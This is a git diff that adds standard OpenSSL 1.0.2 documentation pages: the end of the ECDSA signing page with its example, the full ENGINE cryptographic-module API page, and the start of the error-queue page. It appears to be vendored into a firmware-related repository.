+ECDSA signature of the hash value B<dgst> of size B<dgst_len>
+using the public key B<eckey>.
+
+=head1 RETURN VALUES
+
+ECDSA_size() returns the maximum length signature or 0 on error.
+
+ECDSA_sign_setup() and ECDSA_sign() return 1 if successful or 0
+on error.
+
+ECDSA_verify() and ECDSA_do_verify() return 1 for a valid
+signature, 0 for an invalid signature and -1 on error.
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 EXAMPLES
+
+Creating a ECDSA signature of given SHA-1 hash value using the
+named curve secp192k1.
+
+First step: create a EC_KEY object (note: this part is B<not> ECDSA
+specific)
+
+ int        ret;
+ ECDSA_SIG *sig;
+ EC_KEY    *eckey;
+ eckey = EC_KEY_new_by_curve_name(NID_secp192k1);
+ if (eckey == NULL)
+	{
+	/* error */
+	}
+ if (!EC_KEY_generate_key(eckey))
+	{
+	/* error */
+	}
+
+Second step: compute the ECDSA signature of a SHA-1 hash value 
+using B<ECDSA_do_sign> 
+
+ sig = ECDSA_do_sign(digest, 20, eckey);
+ if (sig == NULL)
+	{
+	/* error */
+	}
+
+or using B<ECDSA_sign>
+
+ unsigned char *buffer, *pp;
+ int            buf_len;
+ buf_len = ECDSA_size(eckey);
+ buffer  = OPENSSL_malloc(buf_len);
+ pp = buffer;
+ if (!ECDSA_sign(0, dgst, dgstlen, pp, &buf_len, eckey);
+	{
+	/* error */
+	}
+
+Third step: verify the created ECDSA signature using B<ECDSA_do_verify>
+
+ ret = ECDSA_do_verify(digest, 20, sig, eckey);
+
+or using B<ECDSA_verify>
+
+ ret = ECDSA_verify(0, digest, 20, buffer, buf_len, eckey);
+
+and finally evaluate the return value:
+
+ if (ret == -1)
+	{
+	/* error */
+	}
+ else if (ret == 0)
+	{
+	/* incorrect signature */
+	}
+ else	/* ret == 1 */
+	{
+	/* signature ok */
+	}
+
+=head1 CONFORMING TO
+
+ANSI X9.62, US Federal Information Processing Standard FIPS 186-2
+(Digital Signature Standard, DSS)
+
+=head1 SEE ALSO
+
+L<dsa(3)|dsa(3)>, L<rsa(3)|rsa(3)>
+
+=head1 HISTORY
+
+The ecdsa implementation was first introduced in OpenSSL 0.9.8
+
+=head1 AUTHOR
+
+Nils Larsch for the OpenSSL project (http://www.openssl.org).
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/engine.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/engine.pod
new file mode 100644
index 0000000..f5ab1c3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/engine.pod
@@ -0,0 +1,599 @@
+=pod
+
+=head1 NAME
+
+engine - ENGINE cryptographic module support
+
+=head1 SYNOPSIS
+
+ #include <openssl/engine.h>
+
+ ENGINE *ENGINE_get_first(void);
+ ENGINE *ENGINE_get_last(void);
+ ENGINE *ENGINE_get_next(ENGINE *e);
+ ENGINE *ENGINE_get_prev(ENGINE *e);
+
+ int ENGINE_add(ENGINE *e);
+ int ENGINE_remove(ENGINE *e);
+
+ ENGINE *ENGINE_by_id(const char *id);
+
+ int ENGINE_init(ENGINE *e);
+ int ENGINE_finish(ENGINE *e);
+
+ void ENGINE_load_openssl(void);
+ void ENGINE_load_dynamic(void);
+ #ifndef OPENSSL_NO_STATIC_ENGINE
+ void ENGINE_load_4758cca(void);
+ void ENGINE_load_aep(void);
+ void ENGINE_load_atalla(void);
+ void ENGINE_load_chil(void);
+ void ENGINE_load_cswift(void);
+ void ENGINE_load_gmp(void);
+ void ENGINE_load_nuron(void);
+ void ENGINE_load_sureware(void);
+ void ENGINE_load_ubsec(void);
+ #endif
+ void ENGINE_load_cryptodev(void);
+ void ENGINE_load_builtin_engines(void);
+
+ void ENGINE_cleanup(void);
+
+ ENGINE *ENGINE_get_default_RSA(void);
+ ENGINE *ENGINE_get_default_DSA(void);
+ ENGINE *ENGINE_get_default_ECDH(void);
+ ENGINE *ENGINE_get_default_ECDSA(void);
+ ENGINE *ENGINE_get_default_DH(void);
+ ENGINE *ENGINE_get_default_RAND(void);
+ ENGINE *ENGINE_get_cipher_engine(int nid);
+ ENGINE *ENGINE_get_digest_engine(int nid);
+
+ int ENGINE_set_default_RSA(ENGINE *e);
+ int ENGINE_set_default_DSA(ENGINE *e);
+ int ENGINE_set_default_ECDH(ENGINE *e);
+ int ENGINE_set_default_ECDSA(ENGINE *e);
+ int ENGINE_set_default_DH(ENGINE *e);
+ int ENGINE_set_default_RAND(ENGINE *e);
+ int ENGINE_set_default_ciphers(ENGINE *e);
+ int ENGINE_set_default_digests(ENGINE *e);
+ int ENGINE_set_default_string(ENGINE *e, const char *list);
+
+ int ENGINE_set_default(ENGINE *e, unsigned int flags);
+
+ unsigned int ENGINE_get_table_flags(void);
+ void ENGINE_set_table_flags(unsigned int flags);
+
+ int ENGINE_register_RSA(ENGINE *e);
+ void ENGINE_unregister_RSA(ENGINE *e);
+ void ENGINE_register_all_RSA(void);
+ int ENGINE_register_DSA(ENGINE *e);
+ void ENGINE_unregister_DSA(ENGINE *e);
+ void ENGINE_register_all_DSA(void);
+ int ENGINE_register_ECDH(ENGINE *e);
+ void ENGINE_unregister_ECDH(ENGINE *e);
+ void ENGINE_register_all_ECDH(void);
+ int ENGINE_register_ECDSA(ENGINE *e);
+ void ENGINE_unregister_ECDSA(ENGINE *e);
+ void ENGINE_register_all_ECDSA(void);
+ int ENGINE_register_DH(ENGINE *e);
+ void ENGINE_unregister_DH(ENGINE *e);
+ void ENGINE_register_all_DH(void);
+ int ENGINE_register_RAND(ENGINE *e);
+ void ENGINE_unregister_RAND(ENGINE *e);
+ void ENGINE_register_all_RAND(void);
+ int ENGINE_register_STORE(ENGINE *e);
+ void ENGINE_unregister_STORE(ENGINE *e);
+ void ENGINE_register_all_STORE(void);
+ int ENGINE_register_ciphers(ENGINE *e);
+ void ENGINE_unregister_ciphers(ENGINE *e);
+ void ENGINE_register_all_ciphers(void);
+ int ENGINE_register_digests(ENGINE *e);
+ void ENGINE_unregister_digests(ENGINE *e);
+ void ENGINE_register_all_digests(void);
+ int ENGINE_register_complete(ENGINE *e);
+ int ENGINE_register_all_complete(void);
+
+ int ENGINE_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f)(void));
+ int ENGINE_cmd_is_executable(ENGINE *e, int cmd);
+ int ENGINE_ctrl_cmd(ENGINE *e, const char *cmd_name,
+         long i, void *p, void (*f)(void), int cmd_optional);
+ int ENGINE_ctrl_cmd_string(ENGINE *e, const char *cmd_name, const char *arg,
+         int cmd_optional);
+
+ int ENGINE_set_ex_data(ENGINE *e, int idx, void *arg);
+ void *ENGINE_get_ex_data(const ENGINE *e, int idx);
+
+ int ENGINE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
+
+ ENGINE *ENGINE_new(void);
+ int ENGINE_free(ENGINE *e);
+ int ENGINE_up_ref(ENGINE *e);
+
+ int ENGINE_set_id(ENGINE *e, const char *id);
+ int ENGINE_set_name(ENGINE *e, const char *name);
+ int ENGINE_set_RSA(ENGINE *e, const RSA_METHOD *rsa_meth);
+ int ENGINE_set_DSA(ENGINE *e, const DSA_METHOD *dsa_meth);
+ int ENGINE_set_ECDH(ENGINE *e, const ECDH_METHOD *dh_meth);
+ int ENGINE_set_ECDSA(ENGINE *e, const ECDSA_METHOD *dh_meth);
+ int ENGINE_set_DH(ENGINE *e, const DH_METHOD *dh_meth);
+ int ENGINE_set_RAND(ENGINE *e, const RAND_METHOD *rand_meth);
+ int ENGINE_set_STORE(ENGINE *e, const STORE_METHOD *rand_meth);
+ int ENGINE_set_destroy_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR destroy_f);
+ int ENGINE_set_init_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR init_f);
+ int ENGINE_set_finish_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR finish_f);
+ int ENGINE_set_ctrl_function(ENGINE *e, ENGINE_CTRL_FUNC_PTR ctrl_f);
+ int ENGINE_set_load_privkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpriv_f);
+ int ENGINE_set_load_pubkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpub_f);
+ int ENGINE_set_ciphers(ENGINE *e, ENGINE_CIPHERS_PTR f);
+ int ENGINE_set_digests(ENGINE *e, ENGINE_DIGESTS_PTR f);
+ int ENGINE_set_flags(ENGINE *e, int flags);
+ int ENGINE_set_cmd_defns(ENGINE *e, const ENGINE_CMD_DEFN *defns);
+
+ const char *ENGINE_get_id(const ENGINE *e);
+ const char *ENGINE_get_name(const ENGINE *e);
+ const RSA_METHOD *ENGINE_get_RSA(const ENGINE *e);
+ const DSA_METHOD *ENGINE_get_DSA(const ENGINE *e);
+ const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *e);
+ const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *e);
+ const DH_METHOD *ENGINE_get_DH(const ENGINE *e);
+ const RAND_METHOD *ENGINE_get_RAND(const ENGINE *e);
+ const STORE_METHOD *ENGINE_get_STORE(const ENGINE *e);
+ ENGINE_GEN_INT_FUNC_PTR ENGINE_get_destroy_function(const ENGINE *e);
+ ENGINE_GEN_INT_FUNC_PTR ENGINE_get_init_function(const ENGINE *e);
+ ENGINE_GEN_INT_FUNC_PTR ENGINE_get_finish_function(const ENGINE *e);
+ ENGINE_CTRL_FUNC_PTR ENGINE_get_ctrl_function(const ENGINE *e);
+ ENGINE_LOAD_KEY_PTR ENGINE_get_load_privkey_function(const ENGINE *e);
+ ENGINE_LOAD_KEY_PTR ENGINE_get_load_pubkey_function(const ENGINE *e);
+ ENGINE_CIPHERS_PTR ENGINE_get_ciphers(const ENGINE *e);
+ ENGINE_DIGESTS_PTR ENGINE_get_digests(const ENGINE *e);
+ const EVP_CIPHER *ENGINE_get_cipher(ENGINE *e, int nid);
+ const EVP_MD *ENGINE_get_digest(ENGINE *e, int nid);
+ int ENGINE_get_flags(const ENGINE *e);
+ const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *e);
+
+ EVP_PKEY *ENGINE_load_private_key(ENGINE *e, const char *key_id,
+     UI_METHOD *ui_method, void *callback_data);
+ EVP_PKEY *ENGINE_load_public_key(ENGINE *e, const char *key_id,
+     UI_METHOD *ui_method, void *callback_data);
+
+ void ENGINE_add_conf_module(void);
+
+=head1 DESCRIPTION
+
+These functions create, manipulate, and use cryptographic modules in the
+form of B<ENGINE> objects. These objects act as containers for
+implementations of cryptographic algorithms, and support a
+reference-counted mechanism to allow them to be dynamically loaded in and
+out of the running application.
+
+The cryptographic functionality that can be provided by an B<ENGINE>
+implementation includes the following abstractions;
+
+ RSA_METHOD - for providing alternative RSA implementations
+ DSA_METHOD, DH_METHOD, RAND_METHOD, ECDH_METHOD, ECDSA_METHOD,
+       STORE_METHOD - similarly for other OpenSSL APIs
+ EVP_CIPHER - potentially multiple cipher algorithms (indexed by 'nid')
+ EVP_DIGEST - potentially multiple hash algorithms (indexed by 'nid')
+ key-loading - loading public and/or private EVP_PKEY keys
+
+=head2 Reference counting and handles
+
+Due to the modular nature of the ENGINE API, pointers to ENGINEs need to be
+treated as handles - ie. not only as pointers, but also as references to
+the underlying ENGINE object. Ie. one should obtain a new reference when
+making copies of an ENGINE pointer if the copies will be used (and
+released) independently.
+
+ENGINE objects have two levels of reference-counting to match the way in
+which the objects are used. At the most basic level, each ENGINE pointer is
+inherently a B<structural> reference - a structural reference is required
+to use the pointer value at all, as this kind of reference is a guarantee
+that the structure can not be deallocated until the reference is released.
+
+However, a structural reference provides no guarantee that the ENGINE is
+initiliased and able to use any of its cryptographic
+implementations. Indeed it's quite possible that most ENGINEs will not
+initialise at all in typical environments, as ENGINEs are typically used to
+support specialised hardware. To use an ENGINE's functionality, you need a
+B<functional> reference. This kind of reference can be considered a
+specialised form of structural reference, because each functional reference
+implicitly contains a structural reference as well - however to avoid
+difficult-to-find programming bugs, it is recommended to treat the two
+kinds of reference independently. If you have a functional reference to an
+ENGINE, you have a guarantee that the ENGINE has been initialised ready to
+perform cryptographic operations and will remain uninitialised
+until after you have released your reference.
+
+I<Structural references>
+
+This basic type of reference is used for instantiating new ENGINEs,
+iterating across OpenSSL's internal linked-list of loaded
+ENGINEs, reading information about an ENGINE, etc. Essentially a structural
+reference is sufficient if you only need to query or manipulate the data of
+an ENGINE implementation rather than use its functionality.
+
+The ENGINE_new() function returns a structural reference to a new (empty)
+ENGINE object. There are other ENGINE API functions that return structural
+references such as; ENGINE_by_id(), ENGINE_get_first(), ENGINE_get_last(),
+ENGINE_get_next(), ENGINE_get_prev(). All structural references should be
+released by a corresponding to call to the ENGINE_free() function - the
+ENGINE object itself will only actually be cleaned up and deallocated when
+the last structural reference is released.
+
+It should also be noted that many ENGINE API function calls that accept a
+structural reference will internally obtain another reference - typically
+this happens whenever the supplied ENGINE will be needed by OpenSSL after
+the function has returned. Eg. the function to add a new ENGINE to
+OpenSSL's internal list is ENGINE_add() - if this function returns success,
+then OpenSSL will have stored a new structural reference internally so the
+caller is still responsible for freeing their own reference with
+ENGINE_free() when they are finished with it. In a similar way, some
+functions will automatically release the structural reference passed to it
+if part of the function's job is to do so. Eg. the ENGINE_get_next() and
+ENGINE_get_prev() functions are used for iterating across the internal
+ENGINE list - they will return a new structural reference to the next (or
+previous) ENGINE in the list or NULL if at the end (or beginning) of the
+list, but in either case the structural reference passed to the function is
+released on behalf of the caller.
+
+To clarify a particular function's handling of references, one should
+always consult that function's documentation "man" page, or failing that
+the openssl/engine.h header file includes some hints.
+
+I<Functional references>
+
+As mentioned, functional references exist when the cryptographic
+functionality of an ENGINE is required to be available. A functional
+reference can be obtained in one of two ways; from an existing structural
+reference to the required ENGINE, or by asking OpenSSL for the default
+operational ENGINE for a given cryptographic purpose.
+
+To obtain a functional reference from an existing structural reference,
+call the ENGINE_init() function. This returns zero if the ENGINE was not
+already operational and couldn't be successfully initialised (eg. lack of
+system drivers, no special hardware attached, etc), otherwise it will
+return non-zero to indicate that the ENGINE is now operational and will
+have allocated a new B<functional> reference to the ENGINE. All functional
+references are released by calling ENGINE_finish() (which removes the
+implicit structural reference as well).
+
+The second way to get a functional reference is by asking OpenSSL for a
+default implementation for a given task, eg. by ENGINE_get_default_RSA(),
+ENGINE_get_default_cipher_engine(), etc. These are discussed in the next
+section, though they are not usually required by application programmers as
+they are used automatically when creating and using the relevant
+algorithm-specific types in OpenSSL, such as RSA, DSA, EVP_CIPHER_CTX, etc.
+
+=head2 Default implementations
+
+For each supported abstraction, the ENGINE code maintains an internal table
+of state to control which implementations are available for a given
+abstraction and which should be used by default. These implementations are
+registered in the tables and indexed by an 'nid' value, because
+abstractions like EVP_CIPHER and EVP_DIGEST support many distinct
+algorithms and modes, and ENGINEs can support arbitrarily many of them.
+In the case of other abstractions like RSA, DSA, etc, there is only one
+"algorithm" so all implementations implicitly register using the same 'nid'
+index.
+
+When a default ENGINE is requested for a given abstraction/algorithm/mode, (eg.
+when calling RSA_new_method(NULL)), a "get_default" call will be made to the
+ENGINE subsystem to process the corresponding state table and return a
+functional reference to an initialised ENGINE whose implementation should be
+used. If no ENGINE should (or can) be used, it will return NULL and the caller
+will operate with a NULL ENGINE handle - this usually equates to using the
+conventional software implementation. In the latter case, OpenSSL will from
+then on behave the way it used to before the ENGINE API existed.
+
+Each state table has a flag to note whether it has processed this
+"get_default" query since the table was last modified, because to process
+this question it must iterate across all the registered ENGINEs in the
+table trying to initialise each of them in turn, in case one of them is
+operational. If it returns a functional reference to an ENGINE, it will
+also cache another reference to speed up processing future queries (without
+needing to iterate across the table). Likewise, it will cache a NULL
+response if no ENGINE was available so that future queries won't repeat the
+same iteration unless the state table changes. This behaviour can also be
+changed; if the ENGINE_TABLE_FLAG_NOINIT flag is set (using
+ENGINE_set_table_flags()), no attempted initialisations will take place,
+instead the only way for the state table to return a non-NULL ENGINE to the
+"get_default" query will be if one is expressly set in the table. Eg.
+ENGINE_set_default_RSA() does the same job as ENGINE_register_RSA() except
+that it also sets the state table's cached response for the "get_default"
+query. In the case of abstractions like EVP_CIPHER, where implementations are
+indexed by 'nid', these flags and cached-responses are distinct for each 'nid'
+value.
+
+=head2 Application requirements
+
+This section will explain the basic things an application programmer should
+support to make the most useful elements of the ENGINE functionality
+available to the user. The first thing to consider is whether the
+programmer wishes to make alternative ENGINE modules available to the
+application and user. OpenSSL maintains an internal linked list of
+"visible" ENGINEs from which it has to operate - at start-up, this list is
+empty and in fact if an application does not call any ENGINE API calls and
+it uses static linking against openssl, then the resulting application
+binary will not contain any alternative ENGINE code at all. So the first
+consideration is whether any/all available ENGINE implementations should be
+made visible to OpenSSL - this is controlled by calling the various "load"
+functions, eg.
+
+ /* Make the "dynamic" ENGINE available */
+ void ENGINE_load_dynamic(void);
+ /* Make the CryptoSwift hardware acceleration support available */
+ void ENGINE_load_cswift(void);
+ /* Make support for nCipher's "CHIL" hardware available */
+ void ENGINE_load_chil(void);
+ ...
+ /* Make ALL ENGINE implementations bundled with OpenSSL available */
+ void ENGINE_load_builtin_engines(void);
+
+Having called any of these functions, ENGINE objects would have been
+dynamically allocated and populated with these implementations and linked
+into OpenSSL's internal linked list. At this point it is important to
+mention an important API function;
+
+ void ENGINE_cleanup(void);
+
+If no ENGINE API functions are called at all in an application, then there
+are no inherent memory leaks to worry about from the ENGINE functionality,
+however if any ENGINEs are loaded, even if they are never registered or
+used, it is necessary to use the ENGINE_cleanup() function to
+correspondingly cleanup before program exit, if the caller wishes to avoid
+memory leaks. This mechanism uses an internal callback registration table
+so that any ENGINE API functionality that knows it requires cleanup can
+register its cleanup details to be called during ENGINE_cleanup(). This
+approach allows ENGINE_cleanup() to clean up after any ENGINE functionality
+at all that your program uses, yet doesn't automatically create linker
+dependencies to all possible ENGINE functionality - only the cleanup
+callbacks required by the functionality you do use will be required by the
+linker.
+
+The fact that ENGINEs are made visible to OpenSSL (and thus are linked into
+the program and loaded into memory at run-time) does not mean they are
+"registered" or called into use by OpenSSL automatically - that behaviour
+is something for the application to control. Some applications
+will want to allow the user to specify exactly which ENGINE they want used
+if any is to be used at all. Others may prefer to load all support and have
+OpenSSL automatically use at run-time any ENGINE that is able to
+successfully initialise - ie. to assume that this corresponds to
+acceleration hardware attached to the machine or some such thing. There are
+probably numerous other ways in which applications may prefer to handle
+things, so we will simply illustrate the consequences as they apply to a
+couple of simple cases and leave developers to consider these and the
+source code to openssl's builtin utilities as guides.
+
+I<Using a specific ENGINE implementation>
+
+Here we'll assume an application has been configured by its user or admin
+to want to use the "ACME" ENGINE if it is available in the version of
+OpenSSL the application was compiled with. If it is available, it should be
+used by default for all RSA, DSA, and symmetric cipher operation, otherwise
+OpenSSL should use its builtin software as per usual. The following code
+illustrates how to approach this;
+
+ ENGINE *e;
+ const char *engine_id = "ACME";
+ ENGINE_load_builtin_engines();
+ e = ENGINE_by_id(engine_id);
+ if(!e)
+     /* the engine isn't available */
+     return;
+ if(!ENGINE_init(e)) {
+     /* the engine couldn't initialise, release 'e' */
+     ENGINE_free(e);
+     return;
+ }
+ if(!ENGINE_set_default_RSA(e))
+     /* This should only happen when 'e' can't initialise, but the previous
+      * statement suggests it did. */
+     abort();
+ ENGINE_set_default_DSA(e);
+ ENGINE_set_default_ciphers(e);
+ /* Release the functional reference from ENGINE_init() */
+ ENGINE_finish(e);
+ /* Release the structural reference from ENGINE_by_id() */
+ ENGINE_free(e);
+
+I<Automatically using builtin ENGINE implementations>
+
+Here we'll assume we want to load and register all ENGINE implementations
+bundled with OpenSSL, such that for any cryptographic algorithm required by
+OpenSSL - if there is an ENGINE that implements it and can be initialise,
+it should be used. The following code illustrates how this can work;
+
+ /* Load all bundled ENGINEs into memory and make them visible */
+ ENGINE_load_builtin_engines();
+ /* Register all of them for every algorithm they collectively implement */
+ ENGINE_register_all_complete();
+
+That's all that's required. Eg. the next time OpenSSL tries to set up an
+RSA key, any bundled ENGINEs that implement RSA_METHOD will be passed to
+ENGINE_init() and if any of those succeed, that ENGINE will be set as the
+default for RSA use from then on.
+
+=head2 Advanced configuration support
+
+There is a mechanism supported by the ENGINE framework that allows each
+ENGINE implementation to define an arbitrary set of configuration
+"commands" and expose them to OpenSSL and any applications based on
+OpenSSL. This mechanism is entirely based on the use of name-value pairs
+and assumes ASCII input (no unicode or UTF for now!), so it is ideal if
+applications want to provide a transparent way for users to provide
+arbitrary configuration "directives" directly to such ENGINEs. It is also
+possible for the application to dynamically interrogate the loaded ENGINE
+implementations for the names, descriptions, and input flags of their
+available "control commands", providing a more flexible configuration
+scheme. However, if the user is expected to know which ENGINE device he/she
+is using (in the case of specialised hardware, this goes without saying)
+then applications may not need to concern themselves with discovering the
+supported control commands and simply prefer to pass settings into ENGINEs
+exactly as they are provided by the user.
+
+Before illustrating how control commands work, it is worth mentioning what
+they are typically used for. Broadly speaking there are two uses for
+control commands; the first is to provide the necessary details to the
+implementation (which may know nothing at all specific to the host system)
+so that it can be initialised for use. This could include the path to any
+driver or config files it needs to load, required network addresses,
+smart-card identifiers, passwords to initialise protected devices,
+logging information, etc etc. This class of commands typically needs to be
+passed to an ENGINE B<before> attempting to initialise it, ie. before
+calling ENGINE_init(). The other class of commands consist of settings or
+operations that tweak certain behaviour or cause certain operations to take
+place, and these commands may work either before or after ENGINE_init(), or
+in some cases both. ENGINE implementations should provide indications of
+this in the descriptions attached to builtin control commands and/or in
+external product documentation.
+
+I<Issuing control commands to an ENGINE>
+
+Let's illustrate by example; a function for which the caller supplies the
+name of the ENGINE it wishes to use, a table of string-pairs for use before
+initialisation, and another table for use after initialisation. Note that
+the string-pairs used for control commands consist of a command "name"
+followed by the command "parameter" - the parameter could be NULL in some
+cases but the name can not. This function should initialise the ENGINE
+(issuing the "pre" commands beforehand and the "post" commands afterwards)
+and set it as the default for everything except RAND and then return a
+boolean success or failure.
+
+ int generic_load_engine_fn(const char *engine_id,
+                            const char **pre_cmds, int pre_num,
+                            const char **post_cmds, int post_num)
+ {
+     ENGINE *e = ENGINE_by_id(engine_id);
+     if(!e) return 0;
+     while(pre_num--) {
+         if(!ENGINE_ctrl_cmd_string(e, pre_cmds[0], pre_cmds[1], 0)) {
+             fprintf(stderr, "Failed command (%s - %s:%s)\n", engine_id,
+                 pre_cmds[0], pre_cmds[1] ? pre_cmds[1] : "(NULL)");
+             ENGINE_free(e);
+             return 0;
+         }
+	 pre_cmds += 2;
+     }
+     if(!ENGINE_init(e)) {
+         fprintf(stderr, "Failed initialisation\n");
+         ENGINE_free(e);
+         return 0;
+     }
+     /* ENGINE_init() returned a functional reference, so free the structural
+      * reference from ENGINE_by_id(). */
+     ENGINE_free(e);
+     while(post_num--) {
+         if(!ENGINE_ctrl_cmd_string(e, post_cmds[0], post_cmds[1], 0)) {
+             fprintf(stderr, "Failed command (%s - %s:%s)\n", engine_id,
+                 post_cmds[0], post_cmds[1] ? post_cmds[1] : "(NULL)");
+             ENGINE_finish(e);
+             return 0;
+         }
+	 post_cmds += 2;
+     }
+     ENGINE_set_default(e, ENGINE_METHOD_ALL & ~ENGINE_METHOD_RAND);
+     /* Success */
+     return 1;
+ }
+
+Note that ENGINE_ctrl_cmd_string() accepts a boolean argument that can
+relax the semantics of the function - if set non-zero it will only return
+failure if the ENGINE supported the given command name but failed while
+executing it, if the ENGINE doesn't support the command name it will simply
+return success without doing anything. In this case we assume the user is
+only supplying commands specific to the given ENGINE so we set this to
+FALSE.
+
+I<Discovering supported control commands>
+
+It is possible to discover at run-time the names, numerical-ids, descriptions
+and input parameters of the control commands supported by an ENGINE using a
+structural reference. Note that some control commands are defined by OpenSSL
+itself and it will intercept and handle these control commands on behalf of the
+ENGINE, ie. the ENGINE's ctrl() handler is not used for the control command.
+openssl/engine.h defines an index, ENGINE_CMD_BASE, that all control commands
+implemented by ENGINEs should be numbered from. Any command value lower than
+this symbol is considered a "generic" command is handled directly by the
+OpenSSL core routines.
+
+It is using these "core" control commands that one can discover the the control
+commands implemented by a given ENGINE, specifically the commands;
+
+ #define ENGINE_HAS_CTRL_FUNCTION		10
+ #define ENGINE_CTRL_GET_FIRST_CMD_TYPE		11
+ #define ENGINE_CTRL_GET_NEXT_CMD_TYPE		12
+ #define ENGINE_CTRL_GET_CMD_FROM_NAME		13
+ #define ENGINE_CTRL_GET_NAME_LEN_FROM_CMD	14
+ #define ENGINE_CTRL_GET_NAME_FROM_CMD		15
+ #define ENGINE_CTRL_GET_DESC_LEN_FROM_CMD	16
+ #define ENGINE_CTRL_GET_DESC_FROM_CMD		17
+ #define ENGINE_CTRL_GET_CMD_FLAGS		18
+
+Whilst these commands are automatically processed by the OpenSSL framework code,
+they use various properties exposed by each ENGINE to process these
+queries. An ENGINE has 3 properties it exposes that can affect how this behaves;
+it can supply a ctrl() handler, it can specify ENGINE_FLAGS_MANUAL_CMD_CTRL in
+the ENGINE's flags, and it can expose an array of control command descriptions.
+If an ENGINE specifies the ENGINE_FLAGS_MANUAL_CMD_CTRL flag, then it will
+simply pass all these "core" control commands directly to the ENGINE's ctrl()
+handler (and thus, it must have supplied one), so it is up to the ENGINE to
+reply to these "discovery" commands itself. If that flag is not set, then the
+OpenSSL framework code will work with the following rules;
+
+ if no ctrl() handler supplied;
+     ENGINE_HAS_CTRL_FUNCTION returns FALSE (zero),
+     all other commands fail.
+ if a ctrl() handler was supplied but no array of control commands;
+     ENGINE_HAS_CTRL_FUNCTION returns TRUE,
+     all other commands fail.
+ if a ctrl() handler and array of control commands was supplied;
+     ENGINE_HAS_CTRL_FUNCTION returns TRUE,
+     all other commands proceed processing ...
+
+If the ENGINE's array of control commands is empty then all other commands will
+fail, otherwise; ENGINE_CTRL_GET_FIRST_CMD_TYPE returns the identifier of
+the first command supported by the ENGINE, ENGINE_GET_NEXT_CMD_TYPE takes the
+identifier of a command supported by the ENGINE and returns the next command
+identifier or fails if there are no more, ENGINE_CMD_FROM_NAME takes a string
+name for a command and returns the corresponding identifier or fails if no such
+command name exists, and the remaining commands take a command identifier and
+return properties of the corresponding commands. All except
+ENGINE_CTRL_GET_FLAGS return the string length of a command name or description,
+or populate a supplied character buffer with a copy of the command name or
+description. ENGINE_CTRL_GET_FLAGS returns a bitwise-OR'd mask of the following
+possible values;
+
+ #define ENGINE_CMD_FLAG_NUMERIC		(unsigned int)0x0001
+ #define ENGINE_CMD_FLAG_STRING			(unsigned int)0x0002
+ #define ENGINE_CMD_FLAG_NO_INPUT		(unsigned int)0x0004
+ #define ENGINE_CMD_FLAG_INTERNAL		(unsigned int)0x0008
+
+If the ENGINE_CMD_FLAG_INTERNAL flag is set, then any other flags are purely
+informational to the caller - this flag will prevent the command being usable
+for any higher-level ENGINE functions such as ENGINE_ctrl_cmd_string().
+"INTERNAL" commands are not intended to be exposed to text-based configuration
+by applications, administrations, users, etc. These can support arbitrary
+operations via ENGINE_ctrl(), including passing to and/or from the control
+commands data of any arbitrary type. These commands are supported in the
+discovery mechanisms simply to allow applications determinie if an ENGINE
+supports certain specific commands it might want to use (eg. application "foo"
+might query various ENGINEs to see if they implement "FOO_GET_VENDOR_LOGO_GIF" -
+and ENGINE could therefore decide whether or not to support this "foo"-specific
+extension).
+
+=head2 Future developments
+
+The ENGINE API and internal architecture is currently being reviewed. Slated for
+possible release in 0.9.8 is support for transparent loading of "dynamic"
+ENGINEs (built as self-contained shared-libraries). This would allow ENGINE
+implementations to be provided independently of OpenSSL libraries and/or
+OpenSSL-based applications, and would also remove any requirement for
+applications to explicitly use the "dynamic" ENGINE to bind to shared-library
+implementations.
+
+=head1 SEE ALSO
+
+L<rsa(3)|rsa(3)>, L<dsa(3)|dsa(3)>, L<dh(3)|dh(3)>, L<rand(3)|rand(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/err.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/err.pod
new file mode 100644
index 0000000..4a5dc69
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/err.pod
@@ -0,0 +1,186 @@
+=pod
+
+=head1 NAME
+
+err - error codes
+
+=head1 SYNOPSIS
+
+ #include <openssl/err.h>
+
+ unsigned long ERR_get_error(void);
+ unsigned long ERR_peek_error(void);
+ unsigned long ERR_get_error_line(const char **file, int *line);
+ unsigned long ERR_peek_error_line(const char **file, int *line);
+ unsigned long ERR_get_error_line_data(const char **file, int *line,
+         const char **data, int *flags);
+ unsigned long ERR_peek_error_line_data(const char **file, int *line,
+         const char **data, int *flags);
+
+ int ERR_GET_LIB(unsigned long e);
+ int ERR_GET_FUNC(unsigned long e);
+ int ERR_GET_REASON(unsigned long e);
+
+ void ERR_clear_error(void);
+
+ char *ERR_error_string(unsigned long e, char *buf);
+ const char *ERR_lib_error_string(unsigned long e);
+ const char *ERR_func_error_string(unsigned long e);
+ const char *ERR_reason_error_string(unsigned long e);
+
+ void ERR_print_errors(BIO *bp);
+ void ERR_print_errors_fp(FILE *fp);
+
+ void ERR_load_crypto_strings(void);
+ void ERR_free_strings(void);
+
+ void ERR_remove_state(unsigned long pid);
+
+ void ERR_put_error(int lib, int func, int reason, const char *file,
+         int line);
+ void ERR_add_error_data(int num, ...);
+
+ void ERR_load_strings(int lib,ERR_STRING_DATA str[]);
+ unsigned long ERR_PACK(int lib, int func, int reason);
+ int ERR_get_next_error_library(void);
+
+=head1 DESCRIPTION
+
+When a call to the OpenSSL library fails, this is usually signalled
+by the return value, and an error code is stored in an error queue
+associated with the current thread. The B<err> library provides
+functions to obtain these error codes and textual error messages.
+
